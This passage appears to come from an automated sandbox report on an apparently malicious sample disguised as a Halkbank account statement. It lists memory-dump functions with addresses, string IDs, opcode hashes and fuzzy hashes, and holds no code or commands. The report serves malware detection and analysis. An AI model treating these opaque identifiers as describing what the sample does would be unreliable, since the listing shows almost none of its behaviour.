                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ,aq$,aq
                                                              • API String ID: 0-2990736959
                                                              • Opcode ID: 633b510cf2040bf969be7bfbb5cf6e59ef782f206444cf6e89766e5d5d200459
                                                              • Instruction ID: 928163f2507df13d5b5da16ef08bc300bce47f7676564e3d0b0a4ee8084ae23d
                                                              • Opcode Fuzzy Hash: 633b510cf2040bf969be7bfbb5cf6e59ef782f206444cf6e89766e5d5d200459
                                                              • Instruction Fuzzy Hash: 1F818F34A005058FEB5ADF6DCC8896ABBF6BF88304F5581A6D5859B3A1DB31EC41CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06639960 Relevance: 2.7, Strings: 2, Instructions: 213COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (&]q$(aq
                                                              • API String ID: 0-1602648543
                                                              • Opcode ID: 2ec404ff5e42c18475756282975b282bc3690deb39d9fc87a4b2b9448114b228
                                                              • Instruction ID: 69318b917a503f76c629a8bf1ee219328b8f1b2ff3a2dcff5d4030c5171c9f66
                                                              • Opcode Fuzzy Hash: 2ec404ff5e42c18475756282975b282bc3690deb39d9fc87a4b2b9448114b228
                                                              • Instruction Fuzzy Hash: FE71A231F002199FDB55DFA9C8506AFBBB6AFC8710F148529E406AB380EF749D46CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01003480 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Xaq$Xaq
                                                              • API String ID: 0-1488805882
                                                              • Opcode ID: 5b69422e98d0510a4310dc26b664cbaa628ba45dd0da9461d6ec135a10d1f2a8
                                                              • Instruction ID: bbe1419b9b1b97f9c4810265b966efa668cd66289e003940f125904c4561c4e7
                                                              • Opcode Fuzzy Hash: 5b69422e98d0510a4310dc26b664cbaa628ba45dd0da9461d6ec135a10d1f2a8
                                                              • Instruction Fuzzy Hash: 94312539B002258FFF6B4A6D889427EB6EABBC4211F144039D982CF3D5DF79C8448391
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01000C8F Relevance: 1.7, Strings: 1, Instructions: 417COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LR]q
                                                              • API String ID: 0-3081347316
                                                              • Opcode ID: 1dbc4af50181fc8f02376c113b914c8f6cae84591526cb284dfd27c32a9662dd
                                                              • Instruction ID: 20d85c9b10a4146290e2f3a4073e5e6975c1e155b45a13e63f5e47acb2d7abaa
                                                              • Opcode Fuzzy Hash: 1dbc4af50181fc8f02376c113b914c8f6cae84591526cb284dfd27c32a9662dd
                                                              • Instruction Fuzzy Hash: 6E220178904619CFCB54EF64E894A8DBBB2FF49700F2086A9E8499B358DF745D85CF80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01000CA0 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LR]q
                                                              • API String ID: 0-3081347316
                                                              • Opcode ID: 3b262f78962cd50d713c8f6e6398994409b313a1277970c1879d9df26f8ebb98
                                                              • Instruction ID: fd3b98d83f87c3525769dfa7637c7800773a7725025607e9340409e2a3e0b96e
                                                              • Opcode Fuzzy Hash: 3b262f78962cd50d713c8f6e6398994409b313a1277970c1879d9df26f8ebb98
                                                              • Instruction Fuzzy Hash: 1322F174904619CFCB54EF64E894A8DBBB2FF49700F2086A9E8499B358DF745D85CF80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0662BFC4 Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224906615.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6620000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c9f32d1c3542bdf758a1bf3668edbf48447053d9c2aa70fa153c558a7c914044
                                                              • Instruction ID: f1ceaeb50525646adee0c0259a44a314c04a81ad012812a21d5b3d2c18bbb09c
                                                              • Opcode Fuzzy Hash: c9f32d1c3542bdf758a1bf3668edbf48447053d9c2aa70fa153c558a7c914044
                                                              • Instruction Fuzzy Hash: 2E415B7890451ADFDB54CF98C0C0AEEBBB2FF88348F649159E459A7281C731A887CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0662BF64 Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224906615.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6620000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a83dd4fff42aed81b24b1970ffd35f4b22f9d352e73057c03ea943870e1c71b5
                                                              • Instruction ID: 9dac9090a8dbc2ecb6ba3c0dbd53031c0b26334894c36959e570d89b2b073477
                                                              • Opcode Fuzzy Hash: a83dd4fff42aed81b24b1970ffd35f4b22f9d352e73057c03ea943870e1c71b5
                                                              • Instruction Fuzzy Hash: 524138B4D0451ADFDB54CF98D0C0AEDBBB2FF88318F249159E415A7281C731A886CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0662BE18 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224906615.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6620000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: cf852558b40453d41d8452c1cec68fcc5b83da993fc3d66f403bfe789c76b696
                                                              • Instruction ID: 931292813421cef4388086a1a5c8a24d7a7f010a82963df6e3712dc8aad80676
                                                              • Opcode Fuzzy Hash: cf852558b40453d41d8452c1cec68fcc5b83da993fc3d66f403bfe789c76b696
                                                              • Instruction Fuzzy Hash: 0B214AB1D012199BEB18CF9AD984BDEFBF6EF88354F14912AE41473291C7701946CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06628D94 Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LdrInitializeThunk.NTDLL(00000000), ref: 06628ED6
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224906615.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6620000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 13a9b4708676d0992a66ebb17c68d54b74e57d5d9477acfdfde2fd4ccc80d740
                                                              • Instruction ID: 6440f1f06f9ffda9e2f743e6d2924ca14efe51fb7b5a47beb9c48fff0dde12fc
                                                              • Opcode Fuzzy Hash: 13a9b4708676d0992a66ebb17c68d54b74e57d5d9477acfdfde2fd4ccc80d740
                                                              • Instruction Fuzzy Hash: 7911AF74E0112A8FDB44EFA8D880AADBBB5FB88304F54C129E844A7241E730A885CF55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0100A6B0 Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (o]q
                                                              • API String ID: 0-794736227
                                                              • Opcode ID: 25fa37d50cfa22817a73d4a8f4cf18ab2462f853fdd71825f7bd027c362223b7
                                                              • Instruction ID: fd7c6dbed4a27aa762a8dbc898b5e57d312e19ed3ad0eaff1016cf4241f32816
                                                              • Opcode Fuzzy Hash: 25fa37d50cfa22817a73d4a8f4cf18ab2462f853fdd71825f7bd027c362223b7
                                                              • Instruction Fuzzy Hash: 3D41FE357002089FCB269F79D854AAE7BF6BFC8310F2484A9E946D7391CE359C02CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06639710 Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: uz
                                                              • API String ID: 0-117461317
                                                              • Opcode ID: 6960f8a18895599790799f47f42875ff2b6d0967faa15a8e7225f729b924eeda
                                                              • Instruction ID: 995886c824b8f8a3ae1e8e1eeca9869c9771f988a8953813f7756ee13e0896f4
                                                              • Opcode Fuzzy Hash: 6960f8a18895599790799f47f42875ff2b6d0967faa15a8e7225f729b924eeda
                                                              • Instruction Fuzzy Hash: E91144B680034A9FDB10CF99C845BDEBBF4EB48320F148419E518A7210D379A550DFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0100A878 Relevance: .4, Instructions: 406COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0e773217aead326fcd289eba105686bd607cf13a7c962db7c8f1656c2fdb1e63
                                                              • Instruction ID: 79b15cb0f1da4156f80f57635f32f27ba8f96493f809b8f3e137028043fdc6f3
                                                              • Opcode Fuzzy Hash: 0e773217aead326fcd289eba105686bd607cf13a7c962db7c8f1656c2fdb1e63
                                                              • Instruction Fuzzy Hash: 10F10875B00619CFDB15CF6CC584A9DBBF6AF88310F1A8099E559AB3A1CB35EC81CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01007498 Relevance: .2, Instructions: 201COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bf5b30456812dfccaa9bd2e9e062a0b6abbfa60957fa146c76a4f8770b106659
                                                              • Instruction ID: c89fadd46e8c5459cd1efc6fd712217d57fa5224c3932f331ae24bb66fd3678f
                                                              • Opcode Fuzzy Hash: bf5b30456812dfccaa9bd2e9e062a0b6abbfa60957fa146c76a4f8770b106659
                                                              • Instruction Fuzzy Hash: C6712C347002458FEB66DF2CC898AAD7BE5BF49201F1904A5E686CB3B1DB79EC41CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 066315E9 Relevance: .2, Instructions: 173COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 745d56cdaa38068d717a47e280325b89b627b83953c2f1d6d89e3c43d11ffcd1
                                                              • Instruction ID: 8028de7bc94bfabf56a7ec4e7552435f6035f494741cd5d7f3e340788f987e06
                                                              • Opcode Fuzzy Hash: 745d56cdaa38068d717a47e280325b89b627b83953c2f1d6d89e3c43d11ffcd1
                                                              • Instruction Fuzzy Hash: B681A174E412289FDB64DF65DC50BDDBBB2AF89300F1081EAE849A7254DB315E81CF40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0100D3CA Relevance: .2, Instructions: 170COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d5ff64698bfe4833e492fa08b5ac5a706da9471a04a56a8a0a0668e79b4cc771
                                                              • Instruction ID: 6743c0cfda81405672f6a48862938b878304a804a0a6157128be175f5644f1d4
                                                              • Opcode Fuzzy Hash: d5ff64698bfe4833e492fa08b5ac5a706da9471a04a56a8a0a0668e79b4cc771
                                                              • Instruction Fuzzy Hash: B451B27002178ACF93303FA0B5AC52A7BB5FB0F7277606C01E19E90458DBBA5884EB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0100D3D0 Relevance: .2, Instructions: 169COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d246390e7ee6e9dd4205407e45df1daf2f496702b79d6cac8aeb71124cea0dbb
                                                              • Instruction ID: f4b5b9f7aebeadf00294548890203fde5f665edc573c4fd669407d96963c8b7a
                                                              • Opcode Fuzzy Hash: d246390e7ee6e9dd4205407e45df1daf2f496702b79d6cac8aeb71124cea0dbb
                                                              • Instruction Fuzzy Hash: 4351A17002178ACF93303FA0B5AC52A7BB5FB0F7277606C01E19E94458DBBA5884EB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0100E7B9 Relevance: .2, Instructions: 151COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0907c8d36a7f6c630b0f1761c06230ebbb096ba52cbfb0e0b499f10137a0b1bf
                                                              • Instruction ID: 5581c90f854b884fdc28863de870e7782b3a307b4187e538145c9c857690e00c
                                                              • Opcode Fuzzy Hash: 0907c8d36a7f6c630b0f1761c06230ebbb096ba52cbfb0e0b499f10137a0b1bf
                                                              • Instruction Fuzzy Hash: 80612674E01318CFDB25DFA5D848AADBBB2FF48304F208529D849AB395DB395986CF41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0100D719 Relevance: .2, Instructions: 150COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4a6e4b319bd259cfbfb6bbd6dd2798840bb97b11722408ed6d7457209f340476
                                                              • Instruction ID: 7b46ee54e7616176b07a784ef15eb1e8734c4c28fd1b204ae3d0928443461931
                                                              • Opcode Fuzzy Hash: 4a6e4b319bd259cfbfb6bbd6dd2798840bb97b11722408ed6d7457209f340476
                                                              • Instruction Fuzzy Hash: 9851F274E012088FDB05EFE9D594A9DBBF2BF89300F149529E448AB294DB349982CF65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0663E110 Relevance: .1, Instructions: 136COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9220cd90a679b3975efe7a505dedc31c8f97a6c3c9ce50745376ef6b6920096f
                                                              • Instruction ID: c050932e00a86d3cbc3f3dd115d5f571937a91fdf5ea08e9bd12d6360992df40
                                                              • Opcode Fuzzy Hash: 9220cd90a679b3975efe7a505dedc31c8f97a6c3c9ce50745376ef6b6920096f
                                                              • Instruction Fuzzy Hash: A941713590131ACFD744AF70D45D7EEBBB1EF4A306F005829D206662E0CBB81A85CFA6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0100CD70 Relevance: .1, Instructions: 136COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d4293f20f333b9463ad705bb849c0d3de38404145748284710ee6585c0b2ffb2
                                                              • Instruction ID: 393eb6d82511293f30577e98c1639512f12e8f7fd12ca94e9b184da6bf5a7ce3
                                                              • Opcode Fuzzy Hash: d4293f20f333b9463ad705bb849c0d3de38404145748284710ee6585c0b2ffb2
                                                              • Instruction Fuzzy Hash: DC518274E01218DFDB54DFA9D98499DBBF2FF89310F248169E819AB365DB30A901CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01003960 Relevance: .1, Instructions: 134COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2a7b8d6fa0bb2f93e4f207543a28f1204e02d95a8261ccf96adf0c4d1ae5f07d
                                                              • Instruction ID: f8f3a0b3f86a3bae78b7de1823678dc557cd8c5de749c791bbcc0ea79ade120b
                                                              • Opcode Fuzzy Hash: 2a7b8d6fa0bb2f93e4f207543a28f1204e02d95a8261ccf96adf0c4d1ae5f07d
                                                              • Instruction Fuzzy Hash: AE519574E01608CFCB49DFA9D89499DBBF2FF89304B209569E809AB364DB31AD41CF40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01009AC3 Relevance: .1, Instructions: 123COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 983ff0494a59061572d633b74169060af58f96460d99fc320ab060826afd23c1
                                                              • Instruction ID: dddc90557e7a7bc1f023194d6ad185c12b5384b60e4991db1a5f49bda26b730a
                                                              • Opcode Fuzzy Hash: 983ff0494a59061572d633b74169060af58f96460d99fc320ab060826afd23c1
                                                              • Instruction Fuzzy Hash: 43419E31A0424DDFEF16CFA8C844A9EBFF2EF49314F048155E9999B2A6D335E950CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06639E99 Relevance: .1, Instructions: 114COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: af3250f25a62dfa0a3042002304b6a7bc9eb3ca2238903dd241547f23d11d8c9
                                                              • Instruction ID: 1f2c329fd931d66372074c94c91b937627e453472af85d13cd9c90aa2f8b7627
                                                              • Opcode Fuzzy Hash: af3250f25a62dfa0a3042002304b6a7bc9eb3ca2238903dd241547f23d11d8c9
                                                              • Instruction Fuzzy Hash: 9141F0B4E01219CFDB44DFA4D5846EDBBB2FF49304F209129E409AB394EB785A46CF44
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06639EA8 Relevance: .1, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d1ceecf033e352537ded4e2279830d3d7c66a5183f2fdee8c2c72f3e33c0cd6e
                                                              • Instruction ID: d9f50968ec40e8b2c1d41e25b4c8da76ba75ed94571bd364908bc5e50773400d
                                                              • Opcode Fuzzy Hash: d1ceecf033e352537ded4e2279830d3d7c66a5183f2fdee8c2c72f3e33c0cd6e
                                                              • Instruction Fuzzy Hash: 6841FF74E01219CFDB44DFA9D5846EDBBF2BF88304F209129E409A7398EB785A46CF54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01006790 Relevance: .1, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 52d64ddd209f3d1e0b0d3aee0d0f5fd7604a03fa28e7a24bc3a940055b70a3a4
                                                              • Instruction ID: 2b8e1302501e126f4e2877576cdc9a507439ef0f9bc044b04f192ec5dffb0501
                                                              • Opcode Fuzzy Hash: 52d64ddd209f3d1e0b0d3aee0d0f5fd7604a03fa28e7a24bc3a940055b70a3a4
                                                              • Instruction Fuzzy Hash: 3C41F370A00208DFDB26CF58C804BAA7BF7FF44300F04856AE4859B291D776DE55CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01004E20 Relevance: .1, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cf224f9aafdc77d93a1bfb9c08acc9d9312631f00a5647ede43bdb2b6a07fb00
                                                              • Instruction ID: 2ae8aadcd1353f648a89f1d13e7af92b17e3fa5e7b8cc08b9e59a535efc67770
                                                              • Opcode Fuzzy Hash: cf224f9aafdc77d93a1bfb9c08acc9d9312631f00a5647ede43bdb2b6a07fb00
                                                              • Instruction Fuzzy Hash: DA316F31704159AFDF169FA8D844AAE7BA6FF88310F104058FA85CB295CF39CD61DBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0663E100 Relevance: .1, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 00dd8ffc665747b163fd9e90639242c020ad4d58b7889d9e6c372aeac8bd733b
                                                              • Instruction ID: 1a43d112c382190db96eccc273c0e20a770ee45762c71271b6ea6bb714a1ca2c
                                                              • Opcode Fuzzy Hash: 00dd8ffc665747b163fd9e90639242c020ad4d58b7889d9e6c372aeac8bd733b
                                                              • Instruction Fuzzy Hash: DF317F75905319CFE740AFB0D85C3EEBBB1EB4A316F00885AD106662E1CB791685CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01007740 Relevance: .1, Instructions: 87COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 04105fd4cff4e66b32c6c7841ac3429c99de955cf704c48985a6c0c40866259a
                                                              • Instruction ID: 0688f641c2136e1db360538e71829295dbea425b30241ef64c5d0db7e3d9d508
                                                              • Opcode Fuzzy Hash: 04105fd4cff4e66b32c6c7841ac3429c99de955cf704c48985a6c0c40866259a
                                                              • Instruction Fuzzy Hash: A4219D307402114BFBA71A2D8894A7E36C6AFC8A58F244478D9C6CB3D5EE2DE942D781
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0100A869 Relevance: .1, Instructions: 85COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: eb8ee7a9b9a162455997fb20e5071f711026bd600ca9830ab6ccc69072abb8e7
                                                              • Instruction ID: 02bdfbdd43e8aa30e9e1617b3befd1c5b01b04f78065bbb827d7d16f13f97957
                                                              • Opcode Fuzzy Hash: eb8ee7a9b9a162455997fb20e5071f711026bd600ca9830ab6ccc69072abb8e7
                                                              • Instruction Fuzzy Hash: 8C317C75B00609CFDB09CF69C884AAEBBF6BF89710F158158E595D73A1DB34AD02CB90
